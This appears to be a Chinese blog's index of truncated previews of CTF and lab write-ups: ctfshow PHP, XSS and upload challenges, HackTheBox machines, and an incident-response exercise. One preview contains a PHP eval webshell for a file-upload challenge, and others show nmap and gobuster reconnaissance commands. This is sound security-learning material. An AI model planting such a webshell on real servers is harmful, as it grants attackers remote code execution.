ctfshow-web-php特性

writeup

旧文新发 php特性 web89 开始php特性系列了，师傅们，冲冲冲！ <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last M

ctfshow-web之XSS

writeup

以前忘上传的水文 XSS web316 在F12-控制台执行document.cookie，可以看到自己的cookie，提示需要admin，

ctfshow

以前忘上传的水文 web151 直接上传一个马 <?php @eval($_POST['cmd']); 发现有检测前端&#

wp

第三

wp

时隔一年，也是进前20了

wp

AK RE MISC WEB

渗透

Alert Linux · Easy 10.10.11.44 nmap -sV -sC 10.10.11.44 添加hosts规则 10.10.11.44 alert.htb 在Contact Us页

Red Team

Heal Linux · Medium Target IP Address:10.10.11.46 nmap扫描 ip访问跳转heal.htb，添加hosts规则 gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1m

应急响应

CrownJewel-1 Forela 的域控制器受到攻击。据信域管理员帐户已被盗用，并且怀疑威胁行为者在 DC 上转储了 NTDS.dit 数据库。我们刚刚收到了 DC 上使用 vssadmin 的&#

渗透

nmap扫描直接访问ip会301到域名，需要添加一下hosts规则